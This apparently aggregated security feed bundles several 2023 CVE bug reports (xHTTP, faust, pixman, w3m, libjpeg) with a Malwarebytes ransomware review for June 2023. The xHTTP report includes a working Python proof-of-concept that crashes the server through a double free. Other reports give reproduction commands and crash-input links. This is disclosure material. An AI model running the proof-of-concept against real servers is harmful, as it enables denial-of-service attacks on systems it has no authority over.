xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method.

Hi!

It appears that xHTTP contains a double free vulnerability in close\_connection at xhttp.c, line 595.

free(conn\->request.public.headers.list);

The double free can be triggered with a malformed HTTP request method. For example, the following python3 script will make a request to the server with a malformed HTTP request method to trigger the double free:

    #!/usr/bin/env python3
    
    import socket
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    sock.connect(('localhost', 8080))
    
    http_headers = (
        #Request - http_headers
        b'MALFORMEDMETHOD'*1000  +  # HTTP Method (POST Request).  Sending malformed HTTP Methods invokes a double free in xHTTP
        b' '  
        b'/'  
        b' HTTP/1.0'  
        b'\r\n' 
        b'Host: '  
        b'localhost'  
        b':'  
        b'8080'  
        b'\r\n'  
        b'Accept-Encoding: '  
        b'identity'  
        b'\r\n'  
        b'Content-Type: '  #Content type
        b'application/json'  #JSON content type
        b'\r\n'  
        
        b'Connection: close\r\n'  
        b'User-Agent: '  
        b'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'  
        b'\r\n'  
    
        b'Content-Length: '  
        b'152'  #Size - Content-Length_size
        b'\r\n'  
        b'\r\n'  #Delim - crlf_headers_body
            #Block - post_body
            b'data=Somepostdata'  
    
    )
    
    sock.send(http_headers)
    sock.recv(65535)
    
    sock.close()
    

To confirm the issue, I first compiled the example server with debug symbols and address sanitizer:

    gcc example.c  xhttp.c -o main -fsanitize=address -g
    

Once the server was compiled, I executed the server on port 8080

**xHTTP Server**

After the server was up and running I saved the python3 script I created from above and executed it, triggering a double free.

**Python3 script****Address Sanitizer Output**

    =================================================================                       
    ==460363==ERROR: AddressSanitizer: attempting double-free on 0x611000000040 in thread T0:
        #0 0x7f7cfaab76a8 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52
        #1 0x562a5c0a1727 in close_connection /home/kali/projects/fuzzing/xHTTP/xhttp.c:595 
        #2 0x562a5c0a9406 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1749                                                                                                   
        #3 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37            
        #4 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58            
        #5 0x7f7cfa846244 in __libc_start_main_impl ../csu/libc-start.c:381                 
        #6 0x562a5c09f420 in _start (/home/kali/projects/fuzzing/xHTTP/main+0x5420)         
                                                                                                                                                                                    
    0x611000000040 is located 0 bytes inside of 256-byte region [0x611000000040,0x611000000140)
    freed by thread T0 here:                                                                
        #0 0x7f7cfaab76a8 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52   
        #1 0x562a5c0a3a4b in parse /home/kali/projects/fuzzing/xHTTP/xhttp.c:868            
        #2 0x562a5c0a7371 in when_data_is_ready_to_be_read /home/kali/projects/fuzzing/xHTTP/xhttp.c:1459
        #3 0x562a5c0a92e0 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1735           
        #4 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37            
        #5 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
                                                                                            
    previously allocated by thread T0 here:                                                                                                                                         
        #0 0x7f7cfaab78d5 in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:85
        #1 0x562a5c0a2dca in parse /home/kali/projects/fuzzing/xHTTP/xhttp.c:813            
        #2 0x562a5c0a7371 in when_data_is_ready_to_be_read /home/kali/projects/fuzzing/xHTTP/xhttp.c:1459
        #3 0x562a5c0a92e0 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1735
        #4 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37
        #5 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: double-free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52 in __interceptor_free
    
    

A possible fix could be implementing a check to ensure ' conn->request.public.headers.list ' is only freed once.

Thanks!

CVE-2023-38434: Double Free in Commit 72f812d · Issue #1 · cozis/xHTTP

An issue was discovered in the Linux kernel before 6.3.9. ksmbd does not validate the SMB request protocol ID, leading to an out-of-bounds read.

CVE-2023-38430

faust commit ee39a19 was discovered to contain a stack overflow via the component boxppShared::print() at /boxes/ppbox.cpp.

Hi, developers of faust:  
In the test of the binary faust instrumented with ASAN. There is a stack-overflow vulnerability in /build/bin/faust, /faust/compiler/boxes/ppbox.cpp:401 in boxppShared::print(std::ostream&) const. Here is the ASAN mode output (I omit some repeated messages):

\=================================================================  
\==45152==ERROR: AddressSanitizer: stack-overflow on address 0x7f14949f7420 (pc 0x0000006aeaaa bp 0x7f1494a00bb0 sp 0x7f14949f7420 T1)  
#0 0x6aeaaa in boxppShared::print(std::ostream&) const /faust/compiler/boxes/ppbox.cpp:401  
#1 0x6d9c0b in operator<<(std::ostream&, boxpp const&) /faust/compiler/boxes/ppbox.hh:64:16  
#2 0x6d9c0b in streambinopShared(std::ostream&, CTree\*, char const\*, CTree\*, int, int) /faust/compiler/boxes/ppbox.cpp:120:10  
#3 0x6b569e in boxppShared::print(std::ostream&) const /faust/compiler/boxes/ppbox.cpp:482:9  
#4 0x6d9c0b in operator<<(std::ostream&, boxpp const&) /faust/compiler/boxes/ppbox.hh:64:16  
#5 0x6d9c0b in streambinopShared(std::ostream&, CTree\*, char const\*, CTree\*, int, int) /faust/compiler/boxes/ppbox.cpp:120:10  
#6 0x6b74ee in boxppShared::print(std::ostream&) const /faust/compiler/boxes/ppbox.cpp:488:9  
#7 0x6d9c0b in operator<<(std::ostream&, boxpp const&) /faust/compiler/boxes/ppbox.hh:64:16  
SUMMARY: AddressSanitizer: stack-overflow /faust/compiler/boxes/ppbox.cpp:401 in boxppShared::print(std::ostream&) const  
Thread T1 created by T0 here:  
#0 0x61127a in pthread\_create (/faust/build/bin/faust+0x61127a)  
#1 0xbaae26 in callFun(void\* (_)(void_), void\*) /faust/compiler/global.cpp:2225:5  
#2 0xc41570 in createFactory(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, int, char const\*\*, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator >&, bool) /faust/compiler/libcode.cpp:1321:5  
#3 0xc52100 in main /faust/compiler/main.cpp:46:33  
#4 0x7f1498d2dc86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310

\==45152==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/faust/stack-overflow

**Validation steps**

cmake . -DCMAKE\_CXX\_FLAGS="-fsanitize=address -g" -DCMAKE\_C\_FLAGS="-fsanitize=address -g" -DCMAKE\_EXE\_LINKER\_FLAGS="-fsanitize=address" -DINCLUDE\_STATIC=on -DINCLUDE\_HTTP=off -DINCLUDE\_OSC=off  
make -j  
./build/bin/faust -lang ocpp -o /tmp/faust -e -lcc -exp10 -lb -rb -mem -sd @@

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2023-37770: A stack-overflow vulnerability in faust · Issue #922 · grame-cncm/faust

stress-test master commit e4c878 was discovered to contain a FPE vulnerability via the component combine_inner at /pixman-combine-float.c.

Hi, developers of pixman: In the test of the binary pixman instrumented with ASAN. There is an FPE vulnerability in stress-test on the master branch. I feed the picture provided in the demos.

Here is the ASAN mode output:

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==18520==ERROR: AddressSanitizer: FPE on unknown address 0x0000006b07cc (pc 0x0000006b07cc bp 0x7ffe8744a4d0 sp 0x7ffe8744a470 T0)
        #0 0x6b07cc in combine_inner /pixman/pixman/pixman-combine-float.c
        #1 0x6b07cc in combine_conjoint_atop_u_float /pixman/pixman/pixman-combine-float.c:313:1
        #2 0x5ce158 in general_composite_rect /pixman/pixman/pixman-general.c:230:2
        #3 0x4e2749 in pixman_image_composite32 /pixman/pixman/pixman.c:700:2
        #4 0x4c8352 in run_test /pixman/test/stress-test.c:966:13
        #5 0x4c669d in main /pixman/test/stress-test.c:1074:6
        #6 0x7f3323dd6c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #7 0x41c639 in _start (/pixman/test/stress-test+0x41c639)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /pixman/pixman/pixman-combine-float.c in combine_inner
    ==18520==ABORTING

**Crash input**

/pixman/demos/zone\_plate.png

**Environment**

Ubuntu 16.04

Clang 10.0.1

gcc 5.5

Edited Jul 04, 2023 by

CVE-2023-37769: FPE in stress-test (#76) · Issues · Pixman / pixman · GitLab

An out-of-bounds read flaw was found in w3m, in the Strnew_size function in Str.c. This issue may allow an attacker to cause a denial of service through a crafted HTML file.

Hello, I found a out-of-bound read in w3m, function Strnew\_size , Str.c:61 while testing my new fuzzer.

**Steps to reproduce**

    export CC=gcc
    export CFLAGS="-fsanitize=address -g"
    ./configure && make -j
    ./w3m -dump $POC
    

Dockerized reproduce steps (recommended)

    docker pull debian:11 && docker run -it debian:11 bash
    ## now step into the container
    apt update && apt install wget git unzip gcc g++ make libgc-dev libtinfo-dev -y
    git clone https://github.com/tats/w3m && pushd w3m
    export CC="gcc -fsanitize=address -g" && ./configure && make -j
    wget https://github.com/tats/w3m/files/11905204/poc1.zip && unzip poc1.zip
    ./w3m -dump ./poc1
    

**Platform**

*   OS: Debian 11

    $ cat /etc/issue
    Debian GNU/Linux 11 \n \l
    

*   w3m latest commit 93ad5ee

    $ ./w3m -version 
    w3m version w3m/0.5.3+git20230129, options lang=en,m17n,image,color,ansi-color,mouse,menu,cookie,external-uri-loader,w3mmailer,nntp,gopher,ipv6,alarm,mark
    

**ASAN**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==85==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7f147749b742 bp 0x000000000080 sp 0x7ffddcd7c740 T0)
    ==85==The signal is caused by a READ memory access.
    ==85==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
        #0 0x7f147749b742 in GC_malloc_kind_global (/usr/lib/x86_64-linux-gnu/libgc.so.1+0x19742)
        #1 0x5639c506e050 in Strnew_size /w3m/Str.c:61
        #2 0x5639c507a2fb in wc_conv_to_ces /w3m/libwc/conv.c:70
        #3 0x5639c4fbde57 in _saveBuffer /w3m/file.c:7875
        #4 0x5639c4f6cb97 in do_dump /w3m/main.c:1409
        #5 0x5639c4f65a4d in main /w3m/main.c:1115
        #6 0x7f14772a2d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
        #7 0x5639c4f69979 in _start (/w3m/w3m+0xb3979)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libgc.so.1+0x19742) in GC_malloc_kind_global
    ==85==ABORTING
    

**POC**

poc1.zip

CVE-2023-38252: [BUG] Out of bound read in Strnew_size , Str.c:61 · Issue #270 · tats/w3m

libjpeg commit db33a6e was discovered to contain a reachable assertion via BitMapHook::BitMapHook at bitmaphook.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.

Hello, I was playing with my new fuzzer and found two bugs in jpeg's encoding module.

**Environment**

Ubuntu 20.04, gcc 9.4.0, libjpeg latest commit db33a6e

Compile with gcc and AddressSanitizer.

run the program with ./jpeg -p @@ /dev/null

**BUG0**

    jpeg Copyright (C) 2012-2018 Thomas Richter, University of Stuttgart
    and Accusoft
    
    For license conditions, see README.license for details.
    
    =================================================================
    ==666872==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500000f408 at pc 0x559ad43fba61 bp 0x7ffc1d504e10 sp 0x7ffc1d504e00
    READ of size 4 at 0x62500000f408 thread T0
        #0 0x559ad43fba60 in YCbCrTrafo<unsigned short, 1, (unsigned char)1, 1, 0>::RGB2YCbCr(RectAngle<int> const&, ImageBitMap const* const*, int**) (/fuzz/libjpeg/crash/jpeg.asan+0x1d4a60)
        #1 0x559ad459610b in LineBitmapRequester::EncodeRegion(RectAngle<int> const&) /benchmark/libjpeg/control/linebitmaprequester.cpp:404
        #2 0x559ad42b97dd in Image::EncodeRegion(BitMapHook*, RectangleRequest const*) /benchmark/libjpeg/codestream/image.cpp:1159
        #3 0x559ad42a20d0 in JPEG::InternalProvideImage(JPG_TagItem*) /benchmark/libjpeg/interface/jpeg.cpp:813
        #4 0x559ad42a157b in JPEG::ProvideImage(JPG_TagItem*) /benchmark/libjpeg/interface/jpeg.cpp:732
        #5 0x559ad4281d5e in EncodeC(char const*, char const*, char const*, char const*, int, int, int, int, int, int, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, unsigned char, bool, bool, unsigned int, double, int, bool, bool, bool, bool, bool, bool, bool, bool, bool, int, int, int, bool, bool, bool, int, bool, char const*, char const*, char const*, int, int, int, int, bool, int, int, int, int, int, int, int, bool, bool, bool, bool, bool, bool, char const*, char const*, char const*, char const*) /benchmark/libjpeg/cmd/encodec.cpp:693
        #6 0x559ad4271517 in main /benchmark/libjpeg/cmd/main.cpp:760
        #7 0x7f910caca082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
        #8 0x559ad426d9ad in _start (/fuzz/libjpeg/crash/jpeg.asan+0x469ad)
    
    Address 0x62500000f408 is a wild pointer.
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/fuzz/libjpeg/crash/jpeg.asan+0x1d4a60) in YCbCrTrafo<unsigned short, 1, (unsigned char)1, 1, 0>::RGB2YCbCr(RectAngle<int> const&, ImageBitMap const* const*, int**)
    Shadow bytes around the buggy address:
      0x0c4a7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c4a7fff9e80: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff9ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==666872==ABORTING
    

poc0.zip

**BUG1**

    jpeg Copyright (C) 2012-2018 Thomas Richter, University of Stuttgart
    and Accusoft
    
    For license conditions, see README.license for details.
    
    jpeg.asan: bitmaphook.cpp:111: JPG_LONG BitmapHook(JPG_Hook*, JPG_TagItem*): Assertion `maxy - miny < bmm->bmm_ulHeight' failed.
    Aborted
    

The StackTrace is below:

    #0  BitMapHook::BitMapHook (this=0x0, tags=0x0) at bitmaphook.cpp:61
    #1  0x0000564ba8fbf899 in JPEG::InternalProvideImage (this=0x61b000000098, tags=0x7fff2ffd9430) at jpeg.cpp:776
    #2  0x0000564ba8fbf57c in JPEG::ProvideImage (this=0x61b000000098, tags=0x7fff2ffd9430) at jpeg.cpp:732
    #3  0x0000564ba8f9fd5f in EncodeC (source=0x7fff3009b88d "crashes/poc.assert.BitmapHook", ldrsource=0x0, target=0x7fff3009b8ab "/dev/null", ltable=0x0,
        quality=-1, hdrquality=-1, tabletype=0, residualtt=0, maxerror=0, colortrafo=1, baseline=false, lossless=true, progressive=false, residual=false,
        optimize=false, accoding=false, rsequential=false, rprogressive=false, raccoding=false, qscan=false, levels=0 '\000', pyramidal=false, writednl=false,
        restart=0, gamma=0, lsmode=-1, noiseshaping=false, serms=false, losslessdct=false, openloop=false, deadzone=false, lagrangian=false, dering=false,
        xyz=false, cxyz=false, hiddenbits=0, riddenbits=0, resprec=8, separate=false, median=true, noclamp=true, smooth=0, dctbypass=false, sub=0x0,
        ressub=0x0, alpha=0x0, alphamode=1, matte_r=0, matte_g=0, matte_b=0, alpharesiduals=false, alphaquality=70, alphahdrquality=0, alphatt=0,
        residualalphatt=0, ahiddenbits=0, ariddenbits=0, aresprec=8, aopenloop=false, adeadzone=false, alagrangian=false, adering=false, aserms=false,
        abypass=false, quantsteps=0x0, residualquantsteps=0x0, alphasteps=0x0, residualalphasteps=0x0) at encodec.cpp:693
    #4  0x0000564ba8f8f518 in main (argc=3, argv=0x7fff3009a6c0) at main.cpp:760
    

poc1.zip

CVE-2023-37836: two bug in jpeg encoding · Issue #87 · thorfdbg/libjpeg

libjpeg commit db33a6e was discovered to contain a heap buffer overflow via LineBitmapRequester::EncodeRegion at linebitmaprequester.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.

CVE-2023-37837: two bug in jpeg encoding · Issue #87 · thorfdbg/libjpeg

Uncovered issues fall into use-after-free, buffer-overflow, information leak and denial of service vulnerability classes. Some of these could be combined to achieve remote code execution or privilege escalation.

Uncovering weaknesses in Apple macOS and VMWare vCenter: 12 vulnerabilities in RPC implementation

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current stable release.

Botan C++ Crypto Algorithms Library 3.1.1

Categories: Threat Intelligence
Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang. 



(Read more...)




The post Ransomware review: July 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim **did not** pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang. The group's 91 attacks come not long after their extensive GoAnywhere campaign in March, when they hit over 100 organizations using a nasty zero-day.

June also witnessed a staggering increase in attacks from relatively new gangs such as Akira (26) and 8Base (41), enough to propel both of them into the top five—a designation usually reserved for more familiar names like ALPHV, who was conspicuously silent in June. 

Other big stories in June include a suspected LockBit affiliate arrest, the Royal ransomware gang toying with a new encryptor, and a notable increase in attacks on the Manufacturing sector.

  

Known ransomware attacks by gang, June 2023

Comparing June to the earlier months of the year, we notice several shifts in ransomware activity. There was a massive decrease in the activity from Royal, for example, which normally dominates the monthly rankings—often cracking into the top five—with an average of roughly 30 attacks a month in that period. But last month, they posted just two victims. 

While a sudden dip in attacks isn't too unusual for top ransomware gangs, it's worth mentioning that in last month’s review we speculated that Royal might be going through a rebrand. That's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware.

Considering that both Royal and BlackSuit were active last month, however, a rebrand probably isn’t happening any time soon. Instead, it’s likely that Royal is simply testing a new encryptor—especially considering that BlackSuit was used in just two attacks last month—and that this lull can be explained as more or less of a research period for them.

Other interesting anomalies in June include 47 attacks on the Manufacturing industry (which usually averages around 20 attacks a month) and notable increases in attacks on Switzerland (14) and Brazil (13), both of which are normally attacked only two or three times a month. Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month, while PLAY focused on Switzerland (5).

Known ransomware attacks by country, June 2023

Known ransomware attacks by industry sector, June 2023

Cl0p's precipitous rise to the top of the charts this month, on the other hand, can be explained by their exploitation of a zero-day in MOVEit Transfer, a widely used file transfer software.

The vulnerability, which could allow attackers to gain escalated privileges and unauthorized access to an environment, was first disclosed on May 31st in a security bulletin released by Progress. But while it was clear earlier on that attackers were actively exploiting CVE-2023-34362, it was only a few days later that it became clear that Cl0p was behind the attacks. A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend. What’s more, two other vulnerabilities in MOVEit were found while new victims were still coming forward.

In terms of the fallout, it’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero-day.

The MOVEit data breaches had widespread impacts, affecting everything from the Oregon DMV and Louisiana OMV (Office of Motor Vehicles)—including the leak of nearly 10 million drivers' licenses—to the University of Rochester and multiple corporations. PBI Research Services also reported a data breach that exposed information for 4.75 million people. The government even offered a reward of up to $10 million for information on Cl0p after several federal agencies in the US fell victim to the gang.

**LockBit **

LockBit reportedly squeezed about $91 million out of US organizations with around 1,700 attacks since 2020, according to a June report by CISA. As confirmed by our own research data, CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022.

As for who was hit the hardest, around 16 percent of ransomware incidents affecting State, Local, Tribal, and Tribunal (SLTT) governments were from LockBit, says the MS-ISAC.

In other news, a suspected LockBit affiliate named Ruslan Magomedovich Astamirov, a 20-year-old from the Chechen Republic, was arrested in Arizona last month. The US Justice Department thinks he's been deploying LockBit ransomware on victim networks both in the States and overseas, with the investigation having run from August 2020 through March 2023.

Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers, plus he's accused of making ransom demands through deploying ransomware. The arrest makes him the third LockBit affiliate charged in the US since November.

**Newcomers****NoEscape**

NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023. Developed in-house using C++, the NoEscape ransomware uses a hybrid approach to encryption, combining ChaCha20 and RSA encryption algorithms for file encryption and key protection.

Last month, NoEscape posted 7 victims on their leak site.

**Darkrace**

DarkRace is a new ransomware group first discovered by researcher S!Ri. Darkrace specifically targets Windows operating systems and has several similarities to LockBit.

The gang attacked 10 victims last month, the majority of them being from the Information and Communications Technology (ICT) sectors. Geographically, most victims are located in Europe, specifically Italy. 

**Rhysida**

Rhysida, a new ransomware gang claiming to be a "cybersecurity team," has been in operation since May 17, 2023, making headlines for their high-profile attack against the Chilean Army. 

The gang published a whopping eighteen victims on their leak site in June, making it one of the most prolific newcomers in our month reviews to-date.

Tag

#c++